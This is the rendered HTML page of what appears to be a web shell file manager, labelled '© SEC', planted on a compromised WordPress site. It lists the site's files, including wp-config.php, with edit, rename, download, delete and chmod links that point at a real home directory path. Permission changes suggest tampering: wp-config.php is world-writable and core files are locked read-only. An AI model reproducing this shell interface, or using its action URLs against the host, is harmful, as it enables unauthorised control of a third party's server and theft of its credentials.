<tr> <td><a href="?dir=/home2/happyhe6/public_html/quotes&item=robots.txt&action=edit" class="text-decoration-none text-light"><i class="fa fa-file-code"></i> robots.txt </a></td> <td class="text-light">text/plain</td> <td class="text-light">101 B</td> <td class="text-light">happyhe6/happyhe6</td> <td class="text-light"> <a href="?dir=/home2/happyhe6/public_html/quotes&item=robots.txt&action=chmod"><font color="lime">-rw-r--r--</a> </td> <td class="text-light">2026-07-20 06:06:44</td> <td>  <div class="btn-group"><a href="?dir=/home2/happyhe6/public_html/quotes&item=robots.txt&action=edit" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Edit"><i class="fa fa-file-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=robots.txt&action=rename" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Rename"><i class="fa fa-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=robots.txt&action=download" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Download"><i class="fa fa-file-download"></i></a> <a href="" class="btn btn-outline-light btn-sm mr-1" onclick="return deleteConfirm('?dir=/home2/happyhe6/public_html/quotes&item=robots.txt&action=delete')" data-toggle="tooltip" data-placement="auto" title="Delete"><i class="fa fa-trash"></i></a></div>  </td> </tr>  <tr> <td><a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-activate.php&action=edit" class="text-decoration-none text-light"><i class="fa fa-file-code"></i> wp-activate.php </a></td> <td class="text-light">text/x-php</td> <td class="text-light">7.2 KB</td> <td class="text-light">happyhe6/happyhe6</td> <td class="text-light"> <a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-activate.php&action=chmod"><font color="lime">-rw-r--r--</a> </td> <td class="text-light">2026-05-21 03:12:59</td> <td>  <div class="btn-group"><a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-activate.php&action=edit" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Edit"><i class="fa fa-file-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-activate.php&action=rename" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Rename"><i class="fa fa-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-activate.php&action=download" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Download"><i class="fa fa-file-download"></i></a> <a href="" class="btn btn-outline-light btn-sm mr-1" onclick="return deleteConfirm('?dir=/home2/happyhe6/public_html/quotes&item=wp-activate.php&action=delete')" data-toggle="tooltip" data-placement="auto" title="Delete"><i class="fa fa-trash"></i></a></div>  </td> </tr>  <tr> <td><a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-blog-header.php&action=edit" class="text-decoration-none text-light"><i class="fa fa-file-code"></i> wp-blog-header.php </a></td> <td class="text-light">text/x-php</td> <td class="text-light">506 B</td> <td class="text-light">happyhe6/happyhe6</td> <td class="text-light"> <a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-blog-header.php&action=chmod">-r--r--r-- </td> <td class="text-light">2026-07-20 06:06:36</td> <td>  <div class="btn-group"><a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-blog-header.php&action=edit" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Edit"><i class="fa fa-file-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-blog-header.php&action=rename" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Rename"><i class="fa fa-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-blog-header.php&action=download" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Download"><i class="fa fa-file-download"></i></a> <a href="" class="btn btn-outline-light btn-sm mr-1" onclick="return deleteConfirm('?dir=/home2/happyhe6/public_html/quotes&item=wp-blog-header.php&action=delete')" data-toggle="tooltip" data-placement="auto" title="Delete"><i class="fa fa-trash"></i></a></div>  </td> </tr>  <tr> <td><a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-comments-post.php&action=edit" class="text-decoration-none text-light"><i class="fa fa-file-code"></i> wp-comments-post.php </a></td> <td class="text-light">text/x-php</td> <td class="text-light">2.27 KB</td> <td class="text-light">happyhe6/happyhe6</td> <td class="text-light"> <a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-comments-post.php&action=chmod"><font color="lime">-rw-r--r--</a> </td> <td class="text-light">2023-06-15 04:11:16</td> <td>  <div class="btn-group"><a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-comments-post.php&action=edit" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Edit"><i class="fa fa-file-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-comments-post.php&action=rename" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Rename"><i class="fa fa-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-comments-post.php&action=download" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Download"><i class="fa fa-file-download"></i></a> <a href="" class="btn btn-outline-light btn-sm mr-1" onclick="return deleteConfirm('?dir=/home2/happyhe6/public_html/quotes&item=wp-comments-post.php&action=delete')" data-toggle="tooltip" data-placement="auto" title="Delete"><i class="fa fa-trash"></i></a></div>  </td> </tr>  <tr> <td><a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-config-sample.php&action=edit" class="text-decoration-none text-light"><i class="fa fa-file-code"></i> wp-config-sample.php </a></td> <td class="text-light">text/x-php</td> <td class="text-light">3.26 KB</td> <td class="text-light">happyhe6/happyhe6</td> <td class="text-light"> <a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-config-sample.php&action=chmod"><font color="lime">-rw-r--r--</a> </td> <td class="text-light">2025-08-13 04:47:32</td> <td>  <div class="btn-group"><a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-config-sample.php&action=edit" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Edit"><i class="fa fa-file-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-config-sample.php&action=rename" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Rename"><i class="fa fa-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-config-sample.php&action=download" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Download"><i class="fa fa-file-download"></i></a> <a href="" class="btn btn-outline-light btn-sm mr-1" onclick="return deleteConfirm('?dir=/home2/happyhe6/public_html/quotes&item=wp-config-sample.php&action=delete')" data-toggle="tooltip" data-placement="auto" title="Delete"><i class="fa fa-trash"></i></a></div>  </td> </tr>  <tr> <td><a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-config.php&action=edit" class="text-decoration-none text-light"><i class="fa fa-file-code"></i> wp-config.php </a></td> <td class="text-light">text/x-php</td> <td class="text-light">3.55 KB</td> <td class="text-light">happyhe6/happyhe6</td> <td class="text-light"> <a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-config.php&action=chmod"><font color="lime">-rw-rw-rw-</a> </td> <td class="text-light">2026-07-20 06:06:45</td> <td>  <div class="btn-group"><a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-config.php&action=edit" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Edit"><i class="fa fa-file-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-config.php&action=rename" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Rename"><i class="fa fa-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-config.php&action=download" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Download"><i class="fa fa-file-download"></i></a> <a href="" class="btn btn-outline-light btn-sm mr-1" onclick="return deleteConfirm('?dir=/home2/happyhe6/public_html/quotes&item=wp-config.php&action=delete')" data-toggle="tooltip" data-placement="auto" title="Delete"><i class="fa fa-trash"></i></a></div>  </td> </tr>  <tr> <td><a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-cron.php&action=edit" class="text-decoration-none text-light"><i class="fa fa-file-code"></i> wp-cron.php </a></td> <td class="text-light">text/x-php</td> <td class="text-light">5.49 KB</td> <td class="text-light">happyhe6/happyhe6</td> <td class="text-light"> <a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-cron.php&action=chmod"><font color="lime">-rw-r--r--</a> </td> <td class="text-light">2024-08-03 09:40:16</td> <td>  <div class="btn-group"><a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-cron.php&action=edit" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Edit"><i class="fa fa-file-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-cron.php&action=rename" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Rename"><i class="fa fa-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-cron.php&action=download" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Download"><i class="fa fa-file-download"></i></a> <a href="" class="btn btn-outline-light btn-sm mr-1" onclick="return deleteConfirm('?dir=/home2/happyhe6/public_html/quotes&item=wp-cron.php&action=delete')" data-toggle="tooltip" data-placement="auto" title="Delete"><i class="fa fa-trash"></i></a></div>  </td> </tr>  <tr> <td><a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-links-opml.php&action=edit" class="text-decoration-none text-light"><i class="fa fa-file-code"></i> wp-links-opml.php </a></td> <td class="text-light">text/x-php</td> <td class="text-light">2.43 KB</td> <td class="text-light">happyhe6/happyhe6</td> <td class="text-light"> <a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-links-opml.php&action=chmod"><font color="lime">-rw-r--r--</a> </td> <td class="text-light">2025-05-01 02:52:30</td> <td>  <div class="btn-group"><a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-links-opml.php&action=edit" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Edit"><i class="fa fa-file-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-links-opml.php&action=rename" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Rename"><i class="fa fa-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-links-opml.php&action=download" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Download"><i class="fa fa-file-download"></i></a> <a href="" class="btn btn-outline-light btn-sm mr-1" onclick="return deleteConfirm('?dir=/home2/happyhe6/public_html/quotes&item=wp-links-opml.php&action=delete')" data-toggle="tooltip" data-placement="auto" title="Delete"><i class="fa fa-trash"></i></a></div>  </td> </tr>  <tr> <td><a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-load.php&action=edit" class="text-decoration-none text-light"><i class="fa fa-file-code"></i> wp-load.php </a></td> <td class="text-light">text/x-php</td> <td class="text-light">3.98 KB</td> <td class="text-light">happyhe6/happyhe6</td> <td class="text-light"> <a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-load.php&action=chmod">-r--r--r-- </td> <td class="text-light">2026-07-20 06:06:36</td> <td>  <div class="btn-group"><a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-load.php&action=edit" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Edit"><i class="fa fa-file-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-load.php&action=rename" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Rename"><i class="fa fa-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-load.php&action=download" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Download"><i class="fa fa-file-download"></i></a> <a href="" class="btn btn-outline-light btn-sm mr-1" onclick="return deleteConfirm('?dir=/home2/happyhe6/public_html/quotes&item=wp-load.php&action=delete')" data-toggle="tooltip" data-placement="auto" title="Delete"><i class="fa fa-trash"></i></a></div>  </td> </tr>  <tr> <td><a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-login.php&action=edit" class="text-decoration-none text-light"><i class="fa fa-file-code"></i> wp-login.php </a></td> <td class="text-light">text/x-php</td> <td class="text-light">50.63 KB</td> <td class="text-light">happyhe6/happyhe6</td> <td class="text-light"> <a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-login.php&action=chmod"><font color="lime">-rw-r--r--</a> </td> <td class="text-light">2026-05-21 03:12:58</td> <td>  <div class="btn-group"><a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-login.php&action=edit" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Edit"><i class="fa fa-file-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-login.php&action=rename" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Rename"><i class="fa fa-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-login.php&action=download" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Download"><i class="fa fa-file-download"></i></a> <a href="" class="btn btn-outline-light btn-sm mr-1" onclick="return deleteConfirm('?dir=/home2/happyhe6/public_html/quotes&item=wp-login.php&action=delete')" data-toggle="tooltip" data-placement="auto" title="Delete"><i class="fa fa-trash"></i></a></div>  </td> </tr>  <tr> <td><a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-mail.php&action=edit" class="text-decoration-none text-light"><i class="fa fa-file-code"></i> wp-mail.php </a></td> <td class="text-light">text/x-php</td> <td class="text-light">8.52 KB</td> <td class="text-light">happyhe6/happyhe6</td> <td class="text-light"> <a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-mail.php&action=chmod"><font color="lime">-rw-r--r--</a> </td> <td class="text-light">2025-04-03 12:25:26</td> <td>  <div class="btn-group"><a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-mail.php&action=edit" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Edit"><i class="fa fa-file-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-mail.php&action=rename" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Rename"><i class="fa fa-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-mail.php&action=download" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Download"><i class="fa fa-file-download"></i></a> <a href="" class="btn btn-outline-light btn-sm mr-1" onclick="return deleteConfirm('?dir=/home2/happyhe6/public_html/quotes&item=wp-mail.php&action=delete')" data-toggle="tooltip" data-placement="auto" title="Delete"><i class="fa fa-trash"></i></a></div>  </td> </tr>  <tr> <td><a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-settings.php&action=edit" class="text-decoration-none text-light"><i class="fa fa-file-code"></i> wp-settings.php </a></td> <td class="text-light">text/x-php</td> <td class="text-light">31.88 KB</td> <td class="text-light">happyhe6/happyhe6</td> <td class="text-light"> <a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-settings.php&action=chmod"><font color="lime">-rw-r--r--</a> </td> <td class="text-light">2026-07-20 06:06:45</td> <td>  <div class="btn-group"><a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-settings.php&action=edit" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Edit"><i class="fa fa-file-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-settings.php&action=rename" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Rename"><i class="fa fa-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-settings.php&action=download" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Download"><i class="fa fa-file-download"></i></a> <a href="" class="btn btn-outline-light btn-sm mr-1" onclick="return deleteConfirm('?dir=/home2/happyhe6/public_html/quotes&item=wp-settings.php&action=delete')" data-toggle="tooltip" data-placement="auto" title="Delete"><i class="fa fa-trash"></i></a></div>  </td> </tr>  <tr> <td><a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-signup.php&action=edit" class="text-decoration-none text-light"><i class="fa fa-file-code"></i> wp-signup.php </a></td> <td class="text-light">text/x-php</td> <td class="text-light">33.81 KB</td> <td class="text-light">happyhe6/happyhe6</td> <td class="text-light"> <a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-signup.php&action=chmod"><font color="lime">-rw-r--r--</a> </td> <td class="text-light">2026-05-21 03:12:58</td> <td>  <div class="btn-group"><a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-signup.php&action=edit" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Edit"><i class="fa fa-file-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-signup.php&action=rename" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Rename"><i class="fa fa-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-signup.php&action=download" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Download"><i class="fa fa-file-download"></i></a> <a href="" class="btn btn-outline-light btn-sm mr-1" onclick="return deleteConfirm('?dir=/home2/happyhe6/public_html/quotes&item=wp-signup.php&action=delete')" data-toggle="tooltip" data-placement="auto" title="Delete"><i class="fa fa-trash"></i></a></div>  </td> </tr>  <tr> <td><a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-trackback.php&action=edit" class="text-decoration-none text-light"><i class="fa fa-file-code"></i> wp-trackback.php </a></td> <td class="text-light">text/x-php</td> <td class="text-light">5.09 KB</td> <td class="text-light">happyhe6/happyhe6</td> <td class="text-light"> <a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-trackback.php&action=chmod"><font color="lime">-rw-r--r--</a> </td> <td class="text-light">2025-08-20 02:30:32</td> <td>  <div class="btn-group"><a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-trackback.php&action=edit" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Edit"><i class="fa fa-file-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-trackback.php&action=rename" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Rename"><i class="fa fa-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=wp-trackback.php&action=download" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Download"><i class="fa fa-file-download"></i></a> <a href="" class="btn btn-outline-light btn-sm mr-1" onclick="return deleteConfirm('?dir=/home2/happyhe6/public_html/quotes&item=wp-trackback.php&action=delete')" data-toggle="tooltip" data-placement="auto" title="Delete"><i class="fa fa-trash"></i></a></div>  </td> </tr>  <tr> <td><a href="?dir=/home2/happyhe6/public_html/quotes&item=xmlrpc.php&action=edit" class="text-decoration-none text-light"><i class="fa fa-file-code"></i> xmlrpc.php </a></td> <td class="text-light">text/x-php</td> <td class="text-light">3.13 KB</td> <td class="text-light">happyhe6/happyhe6</td> <td class="text-light"> <a href="?dir=/home2/happyhe6/public_html/quotes&item=xmlrpc.php&action=chmod"><font color="lime">-rw-r--r--</a> </td> <td class="text-light">2024-11-09 06:52:18</td> <td>  <div class="btn-group"><a href="?dir=/home2/happyhe6/public_html/quotes&item=xmlrpc.php&action=edit" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Edit"><i class="fa fa-file-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=xmlrpc.php&action=rename" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Rename"><i class="fa fa-edit"></i></a> <a href="?dir=/home2/happyhe6/public_html/quotes&item=xmlrpc.php&action=download" class="btn btn-outline-light btn-sm mr-1" data-toggle="tooltip" data-placement="auto" title="Download"><i class="fa fa-file-download"></i></a> <a href="" class="btn btn-outline-light btn-sm mr-1" onclick="return deleteConfirm('?dir=/home2/happyhe6/public_html/quotes&item=xmlrpc.php&action=delete')" data-toggle="tooltip" data-placement="auto" title="Delete"><i class="fa fa-trash"></i></a></div>  </td> </tr>  </tbody> </table> </div> <center> <div class="text-light my-1">&#169; SEC</div> </center> </div> </div> </div> <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/js/bootstrap.bundle.min.js" integrity="sha384-ka7Sk0Gln4gmtz2MlQnikT1wXgYsOg+OMhuP+IlRH9sENBO0LRn5q+8nbTov4+1p" crossorigin="anonymous"></script> <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11.4.0/dist/sweetalert2.all.min.js"></script><script>  function deleteConfirm(url) { event.preventDefault(); Swal.fire({ title: 'Are you sure?', icon: 'warning', showCancelButton: true, confirmButtonColor: '#3085d6', cancelButtonColor: '#d33', confirmButtonText: 'Yes, delete it!' }).then((result) => { if (result.isConfirmed) { window.location.href = url } }) } function jscopy() { var jsCopy = document.getElementById("CopyFromTextArea"); jsCopy.focus(); jsCopy.select(); document.execCommand("copy"); } </script> </body> </html>